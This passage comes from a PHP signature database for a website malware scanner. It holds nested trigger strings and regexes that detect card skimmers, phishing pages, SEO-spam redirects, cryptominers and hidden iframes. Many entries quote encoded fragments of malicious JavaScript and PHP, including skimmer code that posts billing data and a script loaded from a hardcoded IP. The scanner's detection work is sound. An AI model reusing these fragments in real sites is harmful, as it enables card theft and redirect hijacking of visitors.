			'setInterval(bom,' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.010', 'var [\w]+[\s]*=[\s]*[\d]+;[\s]*function bom\(\)[\s]*\{[\s]*var[^\x02]+setInterval\(bom,[\s]*[\d]+\);?'),
		),

		'.join("&"),n=getXmlHttp();' => array(STR_TRIGGER,
			'.setRequestHeader("Content-type' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.014', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*var[\s]*[\w]+[\s]*=[\s]*\{[\w]+:document.getElementById\(.[\w]+.\).value,[\w]+:document.getElementById\([^\{]+\{return\[[\w]+,[\w]+\[[\w]+\]\].[\w]+\(encodeURIComponent\).join\([^\{]+\{var[\s]*[\w]+;try\{[\w]+[\s]*=[\s]*new[\s]*ActiveXObject\([^\{]+\{try\{[\w]+[\s]*=[\s]*new[\s]*ActiveXObject\(.Microsoft.XMLHTTP.\)\}[\s]*catch\([\w]+\)[\s]*\{[^\{]+new[\s]*XMLHttpRequest\),[\w]+\}'),
		),

		'{url:url,crossDomain:false,data:data,type:\'POST' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.019.02', '(\w+)=\w+[^{]+{\s*var\s*(\w+)=document\.getElementsByName\(\w\)\s*;\s*return\s*\2\.length[^{]+{\s*return\s*\2\.value\.replace\([^}]+}\s*setInterval\(function\(\)\s*{\s*if\(\1[^{]+{\1=false[^\2]+window\.location\.host\.split\([^;]+;\s*url=.https?:\/\/[^\2]+data=data\.replace\(..billing[^{]+{url:url,crossDomain:false,data:data,type:.POST.,dataType:.json.}[^;]+;'),
		'style.visibility="hidden";document.getElementById("links").style.display="none";' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.017', '\<div.id.\"links\"><a.href=.http(s|):\/\/(www\.|)\w+\.\w+\/[^\/]*?\/\w+\/\w+\/\w+\.php">[^\/]*\/a\>\.<\/div><script.type..text.javascript..if.document.getElementById..links..!=null..document.\w+\(\"links"\)\.style.\w+..hidden\".document[^o]*one\";.<\/script..\/div.'),
	),

	'document.write' => array(STR_TRIGGER,

		'document.write(unescape(' => array(STR_TRIGGER,

			'if(!$GLOBALS[' => array(STR_TRIGGER,
				'$_SERVER[in(' => array(STR_TRIGGER,
					'empty($_COOKIE[in(' => array(STR_TRIGGER,
						'?><script type=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.258', 'if\(\!\$GLOBALS\[[^\]]+\]\[[\d]+\]\(in\([\d]+\),[\s]*\$_SERVER\[in\([^{]+\{[\s]*\?><script type=.text.javascript.>[^;]+document\.write\(unescape[^;]+;[^}]+<.script><\?php[\s]*\}[\w]+\(\);'),
					),
				),
			),

			'window.location.replace(' => array(STR_TRIGGER,
				'javascript' => array(STR_TRIGGER,
					'%3C%21%44%4F%43%54%59%50%45' => array(STR_CLEARFILE, 'php.phishing.paypal.026', NULL),
				),
			),

			'%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F' => array(STR_TRIGGER,
				'%2E%6F%72%6F%73%70%75%2E%6E%69%6E%6A%61' => array(STR_CLEARFILE, 'js.malware.redirect_orospu_ninja.001', NULL),
			),

			')])AND!$GLOBALS[' => array(STR_TRIGGER,
				'empty($_COOKIE[to(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.077', 'if\(\$[\w]+[\s]*==[\s]*round\([\d]+[^\{]+\$GLOBALS\[.[\w]+.\]\[[\d]+\]\(to\([\d]+\),\$[\w]+\)\)\{[\s]*\?>[\s]*<script[^\}]+<\?php[\s]*\}[\w]+\(\);'),
			),

			'%0A%09%09%72%65%64%69%72%65%63%74%5F%74%6F%28%22%68%74%74%70%3A%2F%2F' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.034', '\$GLOBALS\[[^%]+\)\)[\s]*\{[\s]*\?>[\s]*<script[^>]+>[\s]*<!--[\s]*document\.write\(unescape\(.%[^;]+\)\);[\s]*..-->[\s]*<.script>[\s]*<\?php[\s]*\}[\s]*[\w]+\(\);'),
			'%3C%74%69%74%6C%65%3E%47%6F%6F%67%6C%65%20%44%6F%63%73' => array(STR_CLEARFILE, 'html.phishing.googledocs.006', NULL), 
			'%6e%63%74%69%6f%6e%7c%73%63%72%69%70%74%7c%76%61%72%7c%74%72%79%7c%31%30%7c%66%6f%72%7c%6a%61%76%61%73%63%72%69%70%74%7c%77%72%69%74%65%7c%64%6f%63%75%6d%65%6e%74%7c%75%6e%65%73%63%61%70%65%7c%74%65%78%74%7c%74%79%70%65%7c%68%69%73%74%6f%72%79%7c%67%6f%6f%7c%68%74%74%70%73%7c%67%6c%7c%63%61%74%63%68%7c%78%79%4c%36%6c%51%7c%6f%6e%70%6f%70%73%74%61%74%65%7c%70%75%73%68%53%74%61%74%65%7c%73%74%61%74%65%7c%72%65%70%6c%61%63%65%7c%6c%6f%63%61%74%69%6f%6e%22%2e%73%70%6c%69%74%28%22%7c%22%29%29%29' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.030', '<script[^>]+>document\.write\(unescape\(["\'][\%\w]+%6e%63%74%69%6f%6e%7c%73%63%72%69%70%74%7c%76%61%72%7c%74%72%79%7c%31%30%7c%66%6f%72%7c%6a%61%76%61%73%63%72%69%70%74%7c%77%72%69%74%65%7c%64%6f%63%75%6d%65%6e%74%7c%75%6e%65%73%63%61%70%65%7c%74%65%78%74%7c%74%79%70%65%7c%68%69%73%74%6f%72%79%7c%67%6f%6f%7c%68%74%74%70%73%7c%67%6c%7c%63%61%74%63%68%7c%78%79%4c%36%6c%51%7c%6f%6e%70%6f%70%73%74%61%74%65%7c%70%75%73%68%53%74%61%74%65%7c%73%74%61%74%65%7c%72%65%70%6c%61%63%65%7c%6c%6f%63%61%74%69%6f%6e%22%2e%73%70%6c%69%74%28%22%7c%22%29%29%29%3b%3c%2f%73%63%72%69%70%74%3e["\']\)\)\s*;\s*<.script>'),
			'document.write(unescape(\'%3c%74%69%74%6c%65%3e%45%6d%61%69%6c%20%53%65%74%74%69%6e%67%73%20%7c%20%56%65%72%69%66%69%63%61%74%69%6f%6e%3c%2f%74%69%74%6c%65%3e%0d%0a%0d%0a' => array(STR_CLEARFILE, 'html.phishing.generic.041', NULL),
			'document.write(unescape(\'%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%' => array(STR_CLEARFILE, 'js.defaced.script.014', NULL),
			'document.write(unescape(\'%3C%74%69%74%6C%65%3E%46%75%63%6B%65%64' => array(STR_CLEARFILE, 'js.defaced.script.002', NULL),
			'document.write(unescape(\'%3C%68%74%6D%6C%3E%0A%20%20%3C%68' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.005', 'document.write.unescape..%3C%68%74%6D%6C%3E%0A%20%20%3C%68%65%61%64[^>]+3C%2F%68%74%6D%6C...;'),
			'%41%64%6f%62%65%20%46%6c%61%73%68%20%50%6c%61%79%65%72' => array(STR_CLEAR_LINEMATCH, 'php.malware.fakeupdate.001', 'document.write.unescape[^;]+%41%64%6f%62%65%20%46%6c%61%73%68%20%50%6c%61%79%65%72[^;]+\);'),
			'%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%64%29%3b%3c%2f%73%63%72%69%70%74%3e' => array(STR_CLEARFILE,'js.defaced.script.010', NULL),
			'document.write(unescape(\'%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F%6E%22%20%68%72%65%66%3D%22%66%61%76%69%2E%69%63%6F%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%67%69%66%22%2F%3E%0A%3C%74%69%74%6C%65%3E%4D%61%69%6C' => array(STR_CLEARFILE, 'js.phishing.encoded.001', NULL),
			'$BTB.jshost = (document.location' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.045', '<script[^>]+?>\s*?..<!.CDATA..\s*?\$BTB[^;]+?;\s*?\$BTB\.jsh[^<]+?<\/script>\s*?<script[^>]+?>\s*?\$BTB\.jshost = \(document\.location[^;]+?;\s*?document.write.unescape[^<]+?<\/script>'),
			'39, 59, 77, 61, 117, 110, 101, 115, 99, 97, 112, 101, 40, 78, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 77, 41, 59))' => array(STR_CLEARFILE, 'js.malware.injector.034', NULL),
			'%6d%69%6e%65%72%2e%73%74%61%72%74%28' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.001.04', '<scrip[^>]+?>\s*(?:<!--\s*)?document\.write\(unescape\(\s*["\'](?:%\w\w){1,800}%6d%69%6e%65%72%2e%73%74%61%72%74%28[^;]+?;\s*(?:\/\/-->\s*)?<\/script>'),
			'%3c%74%69%74%6c%65%3e%26%23%33%37%30%33%38%3b%26%23%32%30%32%31%34%3b%26%23%33%35%37%37%34%3b%26%23%33%32%36%32%32%3b%20%7c%20%26%23%33%30%30%30%35%3b%26%23%32%33%33%37%36%3b%26%23%33%37%30%33%38%3b%26%23%32%30%32%31%34%3b%26%23%32%31%33%31%39%3b%26%23%33%32%34%32%33%3b%3c%2f%74' => array(STR_CLEARFILE, 'html.phishing.chinese.001', NULL, 1),
			'--><script>document.write(unescape("%3Cscript%3Eif%28SC%21%3D1%29%7Bfunction%' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.065', '<!--[\s]*[\w]+[\s]*--><script>document.write\(unescape\("%3Cscript%3Eif%28SC%21%3D1%29%7Bfunction%[^)]+"\)\)<.script><!--[^>]+-->'),
			'%3C%74%69%74%6C%65%3E%53%69%67%6E%20%69%6E%20%74%6F%20%79%6F%75%72%20%4D%69%63%72%6F%73%6F%66%74' => array(STR_CLEARFILE, 'js.phishing.microsoft.001', NULL),
			'63%6e%68%76%2e%63%6f' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.019', '<\s*scrip[^>]+>\s*(?:<\s*\!--\s*\w+\s*--\s*>)?\s*<\!--\s*document\.write\(unescape\(.%3c%69%66%72%61%6d%65%20%73[^\2]+63%6e%68%76%2e%63%6f[^\)]+\)\s*\)\s*;(?:\s*\/\/?-->)?\s*<.script>'),
			'5F%69%66%72%65%6C%65%79%69%63%69' => array(STR_CLEARFILE, 'html.defaced.generic.145', NULL),
			'3c%74%69%74%6c%65%3e%53%69%67%6e%20%69%6e%20%74%6f%20%79%6f%75%72%20%61%63%63%6f%75%6e%74%3c%2f%74%69%74%6c%65%3e' => array(STR_CLEARFILE, 'html.phishing.generic.064', NULL),
			'title%3EAccount%20Security%20Settins%3C' => array(STR_CLEARFILE, 'html.phishing.generic.076', NULL),
			'%3c%74%72%3e%3c%74%64%20%68%65%69%67%68%74%3d%22%32%30%30%22%20%62%67%63%6f%6c' => array(STR_CLEARFILE, 'html.phishing.generic.088', NULL),
			'%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6c%75%6e%6f%2e%63%6f%6d' => array(STR_CLEARFILE, 'php.phishing.luno.001', NULL),
		),

		'}c=unescape(b);document.write(c);' => array(STR_TRIGGER,
			'qapkrv\'1G";' => array(STR_TRIGGER, 
				'<script>var a=' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.002.001', '<script>var a="[^">]{150,}"[^>\?]+?\}c=unescape.b.;document.write.c.;<.script>'),
				'var a="' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.002.002', '(<script[^>]+>)?var a="[^">]{150,}"[^>\?]+?\}c=unescape.b.;document.write.c.;(<.script>)?'),
			),
		),

		'60!105!102!114!97!109!101!32!115!114!99!61!34!104' => array(STR_TRIGGER,
			'function Decode(){var temp' => array(STR_CLEAR_MULTIMATCH, 'js.malware.hidden-iframe.005', '<SCRIPT LANGUAGE="JavaScript">[^>]+function Decode\(\)[^>]+97!109!101!62[^>]+>[\s]*<.SCRIPT><SCRIPT LANGUAGE="JavaScript">[\s]*<[^>]+Decode..;[^<]+<.SCRIPT>'),
			'60!105!102!114!97!109!101' => array(STR_CLEAR_LINEMATCH, 'js.malware.hidden-iframe.005.001', 'var\s*temp[^;]+;\s*var\s*str=.60.105.102.114[^;]+101.62[^\n]+document.write.out.;'),
		),

		'document.writeln' => array(STR_TRIGGER,
			'\x73\x74\x79\x6c\x65\x2e\x64\x69\x73\x70\x6c\x61\x79\x3d\x27\x6e\x6f\x27\x20\x2b\x20\x27\x6e\x65\x27' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.030', '<script\s*type\s*=\s*.text.javascript.>\s*var\s*_\$\s*=\s*\[.[(?:\w\\\)]+.x20.x64.x6f.x63.x75.x6d.x65.x6e.x74.x2e.x67.x65.x74.x45.x6c.x65.x6d.x65.x6e.x74.x42.x79.x49.x64.x28.x27.x67.x73.x74.x73.x27.x20.x2b.x20.x27.x74.x79.x6c.x65.x72.x27.x29.x2e.x73.x74.x79.x6c.x65.x2e.x64.x69.x73.x70.x6c.x61.x79.x3d.x27.x6e.x6f.x27.x20.x2b.x20.x27.x6e.x65.x27[^\]]+\];document\.writeln\(_\$\[\w+\]\);<.script>'),
		),
	
		'jQuery(' => array(STR_TRIGGER,
			'if (jQuery(\'#card_number' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.008', 'jQuery\(document\)\.ready\(function\(\)\s*[^\#]+\#order.\).change\(function[^\#]+\#card_number...val[^>]+>\s*\d+[^\#]+\#card[^>]+>\s*\d+\)\s*\{[^:]+:\s*.[htps]{4,}:[^\}]+\},\s*error:function[^;]+;\s*\}\s*\}\);\s*\}\s*\}\);\s*\}\);'),
		),

		',62,60,47,115,99,114,105,112,116,62);document.write(' => array(STR_TRIGGER,
			',46,120,121,122,47' => array(STR_CLEARFILE, 'js.spam-seo.xyz_script.001', NULL),
		),

		'[\'"<script\\+]{10,}' => array(REX_TRIGGER, 
			'document.write(ln)?\\([\'"<script\\+]{10,}[^;]+src=.(?:http|\\/\\/)[^;]+\\?js=\\d+[^;]+[\'"script\\+>]{10,}\\);' => array(REX_CLEAR_MULTIMATCH, 'rex.docwrite_script.003', 'document.write(ln)?\\([\'"<script\\+]{10,}[^;]+src=.(?:http|\\/\\/)[^;]+\\?js=\\d+[^;]+[\'"script\\+>]{10,}\\);'),
		),

		'cihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcj' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.040', 'function [\w]+\([\w]+\)\{var [\w]+=.ABCDEFGH[^}]+\}if\([^\}]+\}}while[^;]+;document\.write\([^;]+;\};[\w]+\([^;]+\);'),
		'if (!tine_jocker()) {' => array(STR_CLEAR_MULTIMATCH,'js.spam-seo.injector.016', '\(function\(\)[\s]*\{[\s]*function stripos[^<]+document\.write[^\}]+[\s\};]+\)\(\);'),
		'/moc.nibetsap//:ptth"=crs' => array(STR_CLEAR_LINEMATCH, 'js.malware.pastebin_reversed.001', 'document\.write\(.>tpircs\/<>.\w+[^\):]+?\/moc\.nibetsap..:ptth.=crs tpircs<.\.split\(..\)\.reverse\(\).join\(..\)\);'),
		'//:ptth"=crs tpircs<\'.split("").reverse().join(""))' => array(STR_CLEAR_LINEMATCH, 'js.malware.script_reversed.001', 'document\.write\(.>tpircs\/<>[\'"][^\):]+?:ptth.=crs tpircs<.\.split\(..\)\.reverse\(\).join\(..\)\)'),
		'x74\x79\x3A\x76\x69\x73\x69\x62\x6C\x65\x3B\x27\x2F\x3E\x3C\x2F\x64\x69\x76\x3E"];document.writeln(_$[0]);' => array(STR_CLEARFILE, 'js.spam-seo.iframe-doorway.002', NULL),
		'%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%22%68%74%74%70%3A%2F%2F%39%31%2E%32%33%39%2E%31%35%2E%36%31%2F%67%6F%6F%67%6C%65%2E%6A%73%22%29%0A%20%20%20%20%20%20%20' => array(STR_CLEAR_MULTIMATCH, 'js.redirect.window_location.004', '<script language=.javascript.>\s*document.write\(\s*unescape\(\s*.%[^\)]+%20%20%20%20%73%63%72%69%70%74%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%22%68%74%74%70%3A%2F%2F%39%31%2E%32%33%39%2E%31%35%2E%36%31%2F%67%6F%6F%67%6C%65%2E%6A%73%22%29%0A%20%20[^<]+<.script>'),
		'document.write("<div style=\'height:1px; width:1px; overflow:hidden\'>");</script>' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.016', '<script[^>]+>document.write."<div style=.height:1px;[^<]+<.script>.+?<script[^>]+>document.write."<.div>"\);<.script>'),
		'>document.write(\'<d\' + \'iv st\' + \'yle\' + \'="po\' +' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.017', '<script[^>]+>document.write..<d. \+ .iv st. \+ .yle. \+ .="po. [^>]+>.\);<.script>.+?<script[^>]+>document.write..<.div>..;<.script>'),
		'.\')!=-1){document.write(\'<script language="javascript">d' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.040', '<script type..[^>]+>[\s]*function [\w]+\(\)[\s]*\{var Ref=document.referrer;if.Ref.indexOf...google..\)!=-1[^{]+!=-1\)\{document.write..<script[^{]+else.document.write[^;]+\(\);[\s]*<.script>'),
		'function nnn_action' => array(REX_CLEAR_MULTIMATCH, 'rex.nuclearkit.002', '\/\/Copyright[^\{]++\{\s*function stripos[^\}]++\}\s*return false;\s*\}\s*function nnn_action[^\}]+\s*\}\s*\}\s*return \w+;\s*\}\s*function[^\]]+document\.cookie\.match\(new\s*RegExp\(\s*"\(\?:\^\|;\s*\)[^;]+\[\^;[^\}]+\}[^\^]+document.write[^>]+iframe.src\S+(khml|htm|html|php|cgi)[^\}]+\}[^;]+\(\);'),
		'document.write\s*..<.\s*\+\s*[a-z]\[[0-9]\]\+.\s*.\+[a-z]\[[0-9]\]\+.>[^>]+[a-z]\[[0-9]\][^;]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.docwrite_script.001', '<script[^>]*>[^;]*var a=0,m,v[^=]+=new Array\(.[\d]+.,.[\d]+[^>]+document.write\s*..<.\s*\+\s*[a-z]\[[0-9]\]\+.\s*.\+[a-z]\[[0-9]\]\+.>[^>]+[a-z]\[[0-9]\][^;]+;[^<]*<.script>'),
		'document.write[^>]+iframe.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^<]+<.iframe>..;' => array(REX_CLEAR_MULTIMATCH, 'rex.nuclearkit.001.01','\/\*[^\;]+Copyright[^;]+ree Software Foundation[^\{]+function[^\]]+document\.cookie\.match\(new\s*RegExp\(\s*"\(\?:\^\|;\s*\)[^;]+\[\^;[^\}]+\}[^\}]+document.write[^>]+iframe.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^\}]+[\s}]+[\w]+\(\);'),
		'document.write[^>]+iframe.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^<]+<.iframe>..,' => array(REX_CLEAR_MULTIMATCH, 'rex.nuclearkit.001.02', '.\*[^\;]+Copyright[^;]+ree Software Foundation[^\;]+[^\]]+document\.cookie\.match\(new\s*RegExp\(\s*"\(\?:\^\|;\s*\)[^;]+\[\^;[^\}]+\}[^\^]+document.write[^>]+iframe.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^\}]+\.toUTCString[^\n]+;'),
		'document.write[^>]+.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^<]+<.iframe>..,' => array(REX_CLEAR_MULTIMATCH, 'rex.nuclearkit.001.03', '.\*[^\;]+Copyright[^;]+ree Software Foundation[^\;]+[^\]]+document\.cookie\.match\(new\s*RegExp\(\s*"\(\?:\^\|;\s*\)[^;]+\[\^;[^\}]+\}[^\^]+document.write[^>]+.src[^>]+\.\w{3,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^\}]+\.toUTCString[^\n]+;'),
		'document.write[^>]+.src[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^<]+<.iframe>..;' => array(REX_CLEAR_MULTIMATCH, 'rex.nuclearkit.001.04','.\*[^\;]+Copyright[^;]+ree Software Foundation[^\{]+function[^\]]+document\.cookie\.match\(new\s*RegExp\(\s*"\(\?:\^\|;\s*\)[^;]+\[\^;[^\}]+\}[^\^]+document.write[^>]+\.\w{2,}.[a-z]{6,}[0-9][0-9]\.(khml|htm|html|php)[^\}]+\s*(;|\(\)|\}\}\)\(\))(\n?\}\n?\}\n?\w+[^;]+\(\);)?'),
		'document.write\(.<iframe src=.http:..\d+.\d+.\d+.\d+.\S+.php.\s*style=.[^;]+;.><.iframe>.\);' => array(REX_CLEAR_MULTIMATCH, 'rex.docwrite_script.002', 'document.write\(.<iframe src=.http:..\d+.\d+.\d+.\d+.\S+.php. style=.[^;]+;.><.iframe>.\);'),
		'",x="";for(i=0;i<t.length;i+=3){x+=unescape("%"+t.substr(i,2));}document.write(x);' => array(STR_CLEARFILE, 'js.phishing.generic.007', NULL),
		'document.write(atob(\'PHNjcmlwdCBzcmM9Imh0dH' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.072', 'document\.write[\s]*\([\s]*atob[\s]*\(.PHN[^;]+\);'),
	),

	'location' => array(STR_TRIGGER,

		'echo \'google-site-verification: google\'.$_GET[\'google\']' => array(STR_TRIGGER,
			'echo GetFileContent("sit' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.google_verification.003', 'if\(._GET..google.\]!=""\)\{\s*echo .google-site-verification: google.\.._GET[^\}]+\}\s*\$regex =([^<]+<script>document.location=\([^\}]+\}){2}\s*function GetFileContent.\$url.\{[^\}]+\} else \{[^\}]+\}\s*return .file_contents;\s*\}'),
			'if($_GET[\'uu\']' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.google_verification.001', 'if\(._GET..uu.\]!=""\)\{\s*if.stripos.._SERVER[^>]+>document.location[^\}]+\}\s*\}\s*if\(._GET..google.\]!=""\)\{\s*echo .google-site-verification: google.\.._GET[^\}]+\}'),
			'if($isClick=="true")' => array(STR_CLEARFILE, 'php.spam-seo.google_verification.004', NULL),
		),

		'img.src = window.atob(' => array(STR_TRIGGER,
			'&data=' => array(STR_TRIGGER,
				'&loc=' => array(STR_TRIGGER,
					'+ window.btoa(location.href);' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.049', 'var __data[\d]+[\s]*=[\s]*[^\{]+function __preload\(\)[\s]*\{[\s]*setTimeout\(__load,[\s]*[\d]+\);[\s]*\}[\s]*function __load\(\)[\s]*\{[\s]*setInterval\(getData,[\s]*[\d]+\);[\s]*\}[\s]*function getData\(\)[\s]*\{[^}]+\}[\s]*__data[\d]+[\s]*=[\s]*data;[\s]*\}[\s]*return;[\s]*\}[\s]*function __send\(str\)[\s]*\{[\s]*if[\s]*\(!.checkout[^_]+function __isValid[^_]+function __onunload[^_]+contentLoaded\(window,[\s]*__load\);[\s]*__onunload\(\);'),
				),
			),
		),

		'location.href.indexOf(i.atob(' => array(STR_TRIGGER,
			'parentNode.insertBefore(' => array(STR_TRIGGER,
				'}}) (window,document,' => array(STR_TRIGGER,
					'google-analytics' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.069', '\(function\([\w],[\w],[^\}]+location.href.indexOf\([\w]+.atob\([\w]+\)\)[\s]+>[\d]+\)\{[^+]+\+[\w]+\.atob\([\w]+\);[\w]+\.parentNode.insertBefore\([\w]+,[\w]+\)\}\}\)[\s]*\(window,document,[^;]+google-analytics\.com[^\)]+\);'),
				),
			),
		),

		'function GetFileContent($url){' => array(STR_TRIGGER,
			'php?\'.trim($query."|".$_SERVER["SERVER_NAME"]' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.220', 'error_reporting\(0\);[^{]+\$query[\s]*=[\s]*\$_SERVER\[.REQUEST_URI.\];[^>]+if\(preg_match\(...google[^>]+echo[^}]+;[\s]*exit;[\s]*}[^>]+function GetFileContent\(\$url\)[^>]+return \$file_contents;[\s]*}'),
		),

		'if (/google/i.test(navigator.userAgent)) {' => array(STR_TRIGGER,
			'document.body.innerHTML = document.body.innerHTML.replace(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.069', 'function\s*(\w+)\s*\(\)\s*{\s*if\s*\(window\.location\.pathname[^{]+{\s*return\s*;[^{]+{\s*(\w+)\s*=\s*String\(\2\s*\+\s*(\w+)\[i\]\s*\)\s*}\s*\3\s*=\s*\2\s*;\s*if\s*\(\/google\/i\.\w+\(navigator\.userAgent\)\)\s*{[^}]+}\s*}\s*;\s*var\s*\w+\s*=[^;]+;\s*document\.addEventListener\(.DOMContentLoaded.,\s*\1\s*\)\s*;'),
		),

		'if(document.referrer.match(' => array(STR_TRIGGER,
			'+document.location.hostname;' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.043', 'function\s*\w+\(min,\s*max\)\s*\{\s*return\s*Math\.random\(\)\s*\*\s*\(max\s*-\s*min\)\s*\+\s*min\s*;\s*}\s*if\(document\.referrer\.match\([\'"](?:google|bing|yaho)[\'"]\)\s*\|\|[^{]+{\s*if\(Math\.[^{]+{\s*document\.location\s*=\s*[\'"]http[^;]+\+document\.location\.hostname\s*;\s*}\s*}'),
		),

		'wpadminbar' => array(STR_TRIGGER,
			'||navigator[\'userAgent\'][' => array(STR_CLEARFILE, 'js.spam-seo.redirect.049', NULL),
		),

		'h8tt8p://387.18389.580.481/la8ng' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.007', 'if\s*\(document\.cookie\.indexOf\(.visited.\)\s*<\s*\d+\s*\)\s*{\s*document\.cookie\s*=\s*.visited=true;\s*max-age=[^;]+;\s*var\s*\w+;\s*var\s*\w+\s*=\s*\[[(googleyandexyahoomsnramblermail\s\,\.\')]+\]\s*;\s*var\s*\w+\s*=\s*\[.[0-9(location)]+.,\s*.[0-9(http)]+(s)?:[^\]]+\];\s*for\s*\(\w+\s*=\s*\d+\,\s*\w+[^{]+{\s*var\s*\w+\s*=\s*document\.referrer\.indexOf\(\w+\[\w+\]\)\s*>\s*(-)?\d+\s*;\s*if\(set\)window\[\w+\[\d+\]\.replace\(.\d+.g,\s*[\'"]{2}\)\]\s*=\s*\w+\[\d+\]\.replace\(.\d+.g\,\s*[\'"]{2}\);\s*\}\s*}'),
		'if(s.indexOf("google")>0 || s.indexOf("bing")>0' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.007', '<script[^>]*>[\s]*(var)?[\s]*[\w]+=document.referrer;[\s]*if\([\w]+\.indexOf\(.google.\)>[^{]+{[^}]+\.location=[^}]+}[\s]*<.script>'),
		'if (s.indexOf(\'google\') > 0 || s.indexOf(\'aol\')' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.007.02', 'var\s*\w+\s*\=\s*document\.referrer\;\s*if\s*\(s\.indexOf\(.google.\)\s*\>\s*0\s*\|\|\s*s\.indexOf\(.aol.\)[^{]+{\s*location\.href\s*\=\s*.http\:[^;]+\;\s*\}'),
		'document.location.href = \'/americanexpress' => array(STR_CLEARFILE, 'html.phishing.americanexpress.006', NULL),
		'http://cwcargo.com/Checkout"</script>' => array(STR_CLEAR_LINEMATCH, 'html.phishing.checkout.001', '<script>document.location=.http:..cwcargo.com\/Checkout"<.script>'),
		'drid=\' + drug_name' => array(STR_CLEARFILE, 'js.spam-seo.redirect.023', NULL),
		'location.href.search(atob(\'Y2hlY2tvdXQ=' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.003', 'if[\s]*\([\s]*location.href.search[\s]*\(atob[\s]*\(.Y2hlY2tvdXQ=.\)[\s]*\)[\s]*!=[\s]*-1[\s]*\)[\s]*\{var[^\}]+==.\);[\s]*document.head.appendChild[\s]*\(.\);[\s]*\}'),
		'document.write (\'<a style="display: none" href=' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.055', '(<\!--\w+-->)?<scrip[^>]+>document\.write\s*\([\'"]<a\s*style=[\'"]display:\s*none[\'"]\s*href\s*=\s*"http:[^"]+"\s*target=[\'"]_blank[\'"]\s*title=[^>]+>\s*<img\s*alt="[^"]+"\s*src="http:[^"]+"\s*style="border:none"\s*.>[^;]+;\s*var\s*\w+="\w+";var\s*\w+="";\s*var\s*\w+="\w+";\s*var\s*\w+=window\.location;\s*var\s*\w+=document\.referrer;var[^}]+}\s*else\s*{\w+=screen\.colorDepth;}[^<]+<.script><noscript><a\s*href="http:[^"]+"\s*style="display:\s*none[^>]+><img\s*alt="[^"]+"\s*src="http:[^"]+"\s*style="border:none"\s*.><.a><.noscript>(<\!--\w+-->)?'),
		'var[\s]*[\w]+[\s]*=[\s]*new[\s]*Date;[\s]*if\([\s]*[\w]+\.getMonth\(\)[\s]*>[\s]*[\d]+[\s]*\)[\s]*document.location.replace\(.http[^;]+\);' => array(REX_CLEAR_MULTIMATCH, 'js.redirect.document_location.002', 'var[\s]*[\w]+[\s]*=[\s]*new[\s]*Date;[\s]*if\([\s]*[\w]+\.getMonth\(\)[\s]*>[\s]*[\d]+[\s]*\)[\s]*document.location.replace\(.http[^;]+\);'),
	),

	'new RegExp' => array(STR_TRIGGER,

		'onepage|checkout|onestep' => array(STR_TRIGGER,

			'var address' => array(STR_TRIGGER,
				'function send_data() {' => array(STR_CLEARFILE, 'js.malware.magento-cc-stealer.023', NULL),
			),

